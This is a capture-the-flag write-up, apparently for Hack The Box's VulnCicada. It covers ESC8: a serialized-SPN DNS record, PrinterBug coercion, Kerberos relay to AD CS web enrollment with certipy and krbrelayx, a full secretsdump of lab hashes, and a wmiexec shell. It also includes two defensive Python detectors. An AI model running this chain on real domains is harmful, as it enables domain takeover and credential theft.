-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8-9).crt
-rw-rw-rw- 924 Thu Apr 10 04:42:44 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9).crt
-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9-10).crt
-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9-8).crt
-rw-rw-rw- 885 Fri Sep 13 06:50:51 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA.crt
-rw-rw-rw- 331 Fri Sep 13 11:17:59 2024 nsrev_cicada-DC-JPQ225-CA.asp
#
Most of these are .crl (certificate revocation list) and .crt (certificate) files, which normally contain nothing sensitive, but they do show that AD CS is installed on this machine.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# cat nsrev_cicada-DC-JPQ225-CA.asp
<%
Response.ContentType = "application/x-netscape-revocation"
serialnumber = Request.QueryString
set Admin = Server.CreateObject("CertificateAuthority.Admin")
stat = Admin.IsValidCertificate("DC-JPQ225.cicada.vl\cicada-DC-JPQ225-CA", serialnumber)
if stat = 3 then Response.Write("0") else Response.Write("1") end if
%>
A standard certificate revocation query script with nothing sensitive in it.
1.4. ESC8
Enumerate with certipy.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy find -k -no-pass -dc-ip 10.129.200.125 -dc-host DC-JPQ225.cicada.vl -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] Target name (-target) not specified and Kerberos authentication is used. This might fail
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'cicada-DC-JPQ225-CA'
[*] Checking web enrollment for CA 'cicada-DC-JPQ225-CA' @ 'DC-JPQ225.cicada.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : cicada-DC-JPQ225-CA
DNS Name : DC-JPQ225.cicada.vl
Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
Certificate Serial Number : 203386B0B32C3A8649221A3C34E273A3
Certificate Validity Start : 2026-01-15 12:30:17+00:00
Certificate Validity End : 2526-01-15 12:40:17+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CICADA.VL\Administrators
Access Rights
ManageCa : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
ManageCertificates : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
Enroll : CICADA.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates : [!] Could not find any certificate templates
The target is vulnerable to ESC8.
Reference for exploitation: https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc8-ntlm-relay-to-ad-cs-web-enrollment
According to @ly4k's wiki, exploiting this requires the following conditions:
1. The AD CS web service must:
- Allow NTLM authentication: the web server hosting certificate enrollment supports NTLM authentication (allowed by default)
- Not enforce NTLM relay protections such as Extended Protection for Authentication (EPA), also known as channel binding
2. Exploitation steps:
- Coerce authentication: force a privileged account to authenticate with NTLM to the attacker-controlled machine (the domain controller machine account is commonly coerced)
- Set up the NTLM relay: use an NTLM relay tool (for example Certipy's relay command) to listen for incoming NTLM authentication.
- Relay the authentication: Certipy captures the incoming NTLM authentication and forwards (relays) it to the AD CS HTTP web enrollment endpoint (for example https://<ca_server>/certsrv/certfnsh.asp)
- Impersonate and request a certificate: once the AD CS web service has received the relayed NTLM authentication from the privileged account, it processes Certipy's subsequent enrollment request as that account, and Certipy requests a certificate
- Use the certificate for privileged access: the CA issues the certificate and Certipy, sitting in the middle, receives it. The certificate is then used with certipy auth to authenticate as the privileged account via Kerberos PKINIT
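As an added defender-side example (my own code, not part of the original write-up or of Certipy), the script below parses the Certificate Authorities block of certipy find -stdout output and rates each CA's web enrollment against the conditions just listed; the sample input is constructed from the certipy output shown above.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample: the "Certificate Authorities" block of the certipy output
# shown in this write-up, re-indented the way certipy prints it.
SAMPLE_CERTIPY_OUTPUT = r"""
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Validity Start          : 2026-01-15 12:30:17+00:00
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled over HTTP.
"""


@dataclass
class CAInfo:
    name: str = ""
    dns_name: str = ""
    http_enrollment: bool = False
    https_enrollment: bool = False
    enroll_principals: List[str] = field(default_factory=list)


# "Key : Value"; the key is lazy so that a value may itself contain colons (timestamps)
KV = re.compile(r"^\s*(?P<key>[A-Za-z][A-Za-z0-9 ]*?)\s*:\s*(?P<val>.*)$")

# groups whose Enroll right lets any relayed low-privileged identity enroll
LOW_PRIV = ("Authenticated Users", "Domain Users", "Domain Computers", "Everyone")


def parse_certipy_cas(text: str) -> List[CAInfo]:
    """Parse every CA entry of certipy's text output into CAInfo records."""
    cas: List[CAInfo] = []
    ca = None
    web_block = None   # "HTTP" or "HTTPS" while inside the Web Enrollment block
    last_key = None    # needed for multi-line values such as several principals
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.isdigit():             # certipy numbers each CA: 0, 1, ...
            ca = CAInfo()
            cas.append(ca)
            web_block = last_key = None
            continue
        if ca is None:
            continue
        if line in ("HTTP", "HTTPS"):
            web_block = line
            continue
        m = KV.match(line)
        if not m:
            # continuation line of a list value, e.g. a second Enroll principal
            if last_key == "Enroll" and "\\" in line:
                ca.enroll_principals.append(line)
            continue
        key, val = m.group("key").strip(), m.group("val").strip()
        last_key = key
        if key == "CA Name":
            ca.name = val
        elif key == "DNS Name":
            ca.dns_name = val
        elif key == "Enabled" and web_block == "HTTP":
            ca.http_enrollment = val == "True"
        elif key == "Enabled" and web_block == "HTTPS":
            ca.https_enrollment = val == "True"
        elif key == "Enroll":
            ca.enroll_principals.append(val)
    return cas


def assess_esc8(ca: CAInfo) -> Dict[str, object]:
    """Rate one CA's web-enrollment exposure.

    Plain-HTTP enrollment cannot carry TLS channel binding, so any NTLM (or, as on
    this box, Kerberos) authentication relayed to /certsrv is accepted: ESC8.
    HTTPS-only enrollment still accepts relayed NTLM unless Extended Protection for
    Authentication (EPA) is required, which this certipy block does not show, so it
    is reported as "verify-EPA" rather than as safe.
    """
    if ca.http_enrollment:
        verdict = "ESC8"
    elif ca.https_enrollment:
        verdict = "verify-EPA"
    else:
        verdict = "no-web-enrollment"
    broad_enroll = [p for p in ca.enroll_principals if any(g in p for g in LOW_PRIV)]
    fix = ("disable HTTP enrollment, require HTTPS with EPA, and remove NTLM from "
           "the /certsrv site") if verdict != "no-web-enrollment" else "none"
    return {"ca": ca.name, "host": ca.dns_name, "verdict": verdict,
            "broad_enroll": broad_enroll, "fix": fix}


if __name__ == "__main__":
    for ca in parse_certipy_cas(SAMPLE_CERTIPY_OUTPUT):
        print(assess_esc8(ca))
```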
First we check whether the target meets these conditions: nxc reports that channel binding is not enabled and LDAP signing is not enforced.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc ldap 10.129.200.138 -u rosie.powell -p Cicada123 -k
LDAP 10.129.200.138 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl) (signing:None) (channel binding:Never) (NTLM:False)
LDAP 10.129.200.138 389 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
Following the write-ups by 0xdf and xct, two different attack paths are shown below, one performed on Linux and one on Windows.
1.4.1. ESC8 on Linux
The Linux technique is based on https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx.html
Because the KDC and the AD CS web service are on the same machine, NTLM relay is not possible (NTLM's self-relay protection), so Kerberos relay is the only option; adding the serialized-SPN DNS record is what upgrades the NTLM relay into a Kerberos relay.
1.4.1.1. Add a DNS record with a serialized SPN
First, add a forged DNS record for a malicious SPN to the domain, pointing at the attacker's IP.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
This long string is actually a serialized service principal name (serialized SPN). When the DC tries to connect to this "name", the way it is resolved leads the DC to conclude that the target must be authenticated with Kerberos. The DC therefore asks the KDC (itself) for a Kerberos service ticket (TGS) for the attacker instead of sending an NTLM request, which turns the NTLM relay into a Kerberos relay.
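As an added detection example (my own code, not from the write-up, bloodyAD or krbrelayx): the record name above is an ordinary host name with a base64 CredMarshalTargetInfo blob glued on with no separator, so scanning the AD-integrated DNS zone for names of that shape, and for records that point outside the expected subnets, catches this before any relay happens. It assumes only that the blob starts with the fixed 4-byte header the page's own name decodes to; the zone records are a constructed sample.

```python
import base64
import binascii
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# Assumption: the blob CredMarshalTargetInfo appends to a host name begins with a
# fixed 4-byte header. The value is simply what the first characters ("1UWhRCAA")
# of the record name added in this write-up decode to; nothing else about the
# structure's layout is assumed.
TARGET_INFO_MAGIC = base64.b64decode("1UWhRCAA")[:4]      # d5 45 a1 44
B64_LABEL = re.compile(r"[A-Za-z0-9+/]+")

# Constructed sample zone dump: (name, type, data). The second record is the one
# added in the write-up above; the others are ordinary records for contrast.
SAMPLE_RECORDS: List[Tuple[str, str, str]] = [
    ("DC-JPQ225", "A", "10.129.200.138"),
    ("DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA", "A", "10.10.14.86"),
    ("ForestDnsZones", "A", "10.129.200.138"),
    ("_ldap._tcp.dc._msdcs", "SRV", "DC-JPQ225.cicada.vl"),
]


def split_marshalled_name(name: str) -> Optional[Tuple[str, str]]:
    """If `name` is <host><base64 target info>, return (host, suffix), else None.

    The base64 part is glued to the host with no separator, so every split point
    is tried. Only the first 8 base64 characters are decoded to check the header,
    which keeps the check independent of the blob's exact length and padding.
    """
    label = name.split(".")[0]
    for i in range(1, len(label) - 7):
        tail = label[i:]
        if not B64_LABEL.fullmatch(tail):
            continue
        try:
            head = base64.b64decode(tail[:8], validate=True)
        except (binascii.Error, ValueError):
            continue
        if head[:4] == TARGET_INFO_MAGIC:
            return label[:i], tail
    return None


def scan_dns_records(records: List[Tuple[str, str, str]],
                     expected_nets: List[str]) -> List[Dict[str, object]]:
    """Flag records whose name carries a marshalled target-info suffix.

    For address records the target is also compared against the subnets the
    zone is expected to contain; a hit pointing elsewhere is the relay listener.
    """
    nets = [ipaddress.ip_network(n) for n in expected_nets]
    findings: List[Dict[str, object]] = []
    for name, rtype, data in records:
        hit = split_marshalled_name(name)
        if hit is None:
            continue
        host, suffix = hit
        outside = False
        if rtype in ("A", "AAAA"):
            addr = ipaddress.ip_address(data)
            outside = not any(addr in n for n in nets)
        findings.append({
            "record": name,
            "impersonated_host": host,   # the principal whose clients get redirected
            "suffix": suffix,
            "target": data,
            "outside_expected_nets": outside,
        })
    return findings


if __name__ == "__main__":
    for f in scan_dns_records(SAMPLE_RECORDS, ["10.129.200.0/24"]):
        print(f)
```

AD-integrated DNS lets any authenticated user create records by default, which is why rosie.powell could add this one; the impersonated host in a finding tells you which machine's outbound authentication is being redirected.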
1.4.1.2. Kerberos relay via certipy
Then run certipy relay with the server's AD CS web enrollment as the target.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
/root/.local/share/uv/tools/certipy-ad/lib/python3.13/site-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] CICADA.VL\rosie.powell from ccache
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, DFSCoerce
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, MSEven
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] CICADA.VL\rosie.powell from ccache
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
On the relay side we then receive the connection from the domain controller, relay it to the domain controller itself, and receive a .pfx certificate issued for the DC.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
/root/.local/share/uv/tools/certipy-ad/lib/python3.13/site-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] SMBD-Thread-2 (process_request_thread): Received connection from 10.129.200.138, attacking target http://dc-jpq225.cicada.vl
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Authenticating against http://dc-jpq225.cicada.vl as / SUCCEED
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.129.200.138, attacking target http://dc-jpq225.cicada.vl
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: POST http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 88
[*] Retrieving certificate for request ID: 88
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certnew.cer?ReqID=88 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Certificate object SID is 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Saving certificate and private key to 'dc-jpq225.pfx'
[*] Wrote certificate and private key to 'dc-jpq225.pfx'
[*] Exiting...
Then request a TGT for the domain controller machine account.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.200.138
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# impacket-secretsdump -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
cicada.vl\Shirley.West:1104:aad3b435b51404eeaad3b435b51404ee:ff99630bed1e3bfd90e6a193d603113f:::
cicada.vl\Jordan.Francis:1105:aad3b435b51404eeaad3b435b51404ee:f5caf661b715c4e1435dfae92c2a65e3:::
cicada.vl\Jane.Carter:1106:aad3b435b51404eeaad3b435b51404ee:7e133f348892d577014787cbc0206aba:::
cicada.vl\Joyce.Andrews:1107:aad3b435b51404eeaad3b435b51404ee:584c796cd820a48be7d8498bc56b4237:::
cicada.vl\Daniel.Marshall:1108:aad3b435b51404eeaad3b435b51404ee:8cdf5eeb0d101559fa4bf00923cdef81:::
cicada.vl\Rosie.Powell:1109:aad3b435b51404eeaad3b435b51404ee:ff99630bed1e3bfd90e6a193d603113f:::
cicada.vl\Megan.Simpson:1110:aad3b435b51404eeaad3b435b51404ee:6e63f30a8852d044debf94d73877076a:::
cicada.vl\Katie.Ward:1111:aad3b435b51404eeaad3b435b51404ee:42f8890ec1d9b9c76a187eada81adf1e:::
cicada.vl\Richard.Gibbons:1112:aad3b435b51404eeaad3b435b51404ee:d278a9baf249d01b9437f0374bf2e32e:::
cicada.vl\Debra.Wright:1113:aad3b435b51404eeaad3b435b51404ee:d9a2147edbface1666532c9b3acafaf3:::
DC-JPQ225$:1000:aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f9181ec2240a0d172816f3b5a185b6e3e0ba773eae2c93a581d9415347153e1a
Administrator:aes128-cts-hmac-sha1-96:926e5da4d5cd0be6e1cea21769bb35a4
Administrator:des-cbc-md5:fd2a29621f3e7604
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
cicada.vl\Shirley.West:aes256-cts-hmac-sha1-96:3f3657fb6f0d441680e9c5e0c104ef4005fa5e79b01bbeed47031b04a913f353
cicada.vl\Shirley.West:aes128-cts-hmac-sha1-96:cd16a8664de29a4e8bd9e8b492f3eef9
cicada.vl\Shirley.West:des-cbc-md5:abbf341664bafe76
cicada.vl\Jordan.Francis:aes256-cts-hmac-sha1-96:ec8aaa2c9432ed3b0d2834e4e24dc243ec8d77ec3488101e79d1b2cc1c2ee6ea
cicada.vl\Jordan.Francis:aes128-cts-hmac-sha1-96:0b551142246edc108a92913e46852404
cicada.vl\Jordan.Francis:des-cbc-md5:a2e53d6ea44ab6e9
cicada.vl\Jane.Carter:aes256-cts-hmac-sha1-96:bb04095d1884439b825a5606dd43aadfd2a8fad1386b3728b9bad582efd5d4aa
cicada.vl\Jane.Carter:aes128-cts-hmac-sha1-96:8a27618e7036a49fb6e371f2e7af649e
cicada.vl\Jane.Carter:des-cbc-md5:340eda8962cbadce
cicada.vl\Joyce.Andrews:aes256-cts-hmac-sha1-96:7ca8317638d429301dfbb88af701fadffbc106d31f79a4de7e8d35afbc2d30c4
cicada.vl\Joyce.Andrews:aes128-cts-hmac-sha1-96:6ec2495dea28c09cf636dd8b080012fd
cicada.vl\Joyce.Andrews:des-cbc-md5:6bf2b6f21fcda258
cicada.vl\Daniel.Marshall:aes256-cts-hmac-sha1-96:fcccb590bac0a888898461247fbb3ee28d282671d8491e0b0b83ac688c2a29d6
cicada.vl\Daniel.Marshall:aes128-cts-hmac-sha1-96:80a3b053500586eefd07d32fc03e3849
cicada.vl\Daniel.Marshall:des-cbc-md5:e0fbdcb3c7e9f154
cicada.vl\Rosie.Powell:aes256-cts-hmac-sha1-96:54de41137f8d37d4a6beac1638134dfefa73979041cae3ffc150ebcae470fce5
cicada.vl\Rosie.Powell:aes128-cts-hmac-sha1-96:d01b3b63a2cde0d1c5e9e0e4a55529a4
cicada.vl\Rosie.Powell:des-cbc-md5:6e70b9a41a677a94
cicada.vl\Megan.Simpson:aes256-cts-hmac-sha1-96:cdb94aaf5b15465371cbe42913d652fa7e2a2e43afc8dd8a17fee1d3f142da3b
cicada.vl\Megan.Simpson:aes128-cts-hmac-sha1-96:8fd3f86397ee83ed140a52bdfa321df0
cicada.vl\Megan.Simpson:des-cbc-md5:587032806b5d19b6
cicada.vl\Katie.Ward:aes256-cts-hmac-sha1-96:829effafe88a0a5e17c4ccf1840f277327309b2902aeccc36625ac51b8e936bc
cicada.vl\Katie.Ward:aes128-cts-hmac-sha1-96:585264bc071354147db5b677be13506b
cicada.vl\Katie.Ward:des-cbc-md5:01801aa2e5755898
cicada.vl\Richard.Gibbons:aes256-cts-hmac-sha1-96:3c3beb85ec35003399e37ae578b90ae7a65b4ec7305e0ac012dbeaaa41bcbe22
cicada.vl\Richard.Gibbons:aes128-cts-hmac-sha1-96:646557f4143182bda5618f95429f3a49
cicada.vl\Richard.Gibbons:des-cbc-md5:834a675bd058efd0
cicada.vl\Debra.Wright:aes256-cts-hmac-sha1-96:26409e8cc8f3240501db7319bd8d8a2077d6b955a8f673b9ccf7d9086d3aec62
cicada.vl\Debra.Wright:aes128-cts-hmac-sha1-96:6a289ddd9a1a2196b671b4bbff975629
cicada.vl\Debra.Wright:des-cbc-md5:f25eb6a4265413cb
DC-JPQ225$:aes256-cts-hmac-sha1-96:01e2f9943c6c0c3f010dde6dddcae89cc81158e4f1c017e6fc34f85538d892b1
DC-JPQ225$:aes128-cts-hmac-sha1-96:87efc91730d07d819f58b4996e3fa04c
DC-JPQ225$:des-cbc-md5:6df208855d40dfcb
[*] Cleaning up...
evil-winrm was flaky here: it dropped the connection as soon as I ran anything.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# evil-winrm -i DC-JPQ225.cicada.vl -u administrator -H 85a0da53871a9d56b6cd05deda3a5e87
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\>
Error: An error of type ArgumentError happened, message is unknown type: 2061232681
Error: Exiting with code 1
Switched to wmiexec:
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# impacket-wmiexec -k DC-JPQ225.cicada.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
cicada\administrator
1.4.1.3. Kerberos relay via krbrelayx
The DNS record added below is the DC's own hostname with a marshalled CREDENTIAL_TARGET_INFORMATION suffix appended (the "SPN serialization" trick). When the coerced DC connects to that name it resolves to our IP, but Windows unmarshals the suffix when it builds the Kerberos SPN, so the AP-REQ that reaches krbrelayx carries a service ticket for the DC's own machine account rather than for our host. krbrelayx forwards that AP-REQ to the AD CS web enrollment endpoint on the DC, which accepts it because the ticket is encrypted with the DC machine account's key. The later "Unsupported MechType NTLMSSP" lines in the output are connections that offered NTLM instead of Kerberos; krbrelayx only relays Kerberos and drops them.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 92
[*] Writing PKCS#12 certificate to ./unknown5898$.pfx
[*] Certificate successfully written to file
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
On newer pyOpenSSL versions, where crypto.PKCS12 has been removed, the relay may instead fail at the PKCS#12 export step:
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
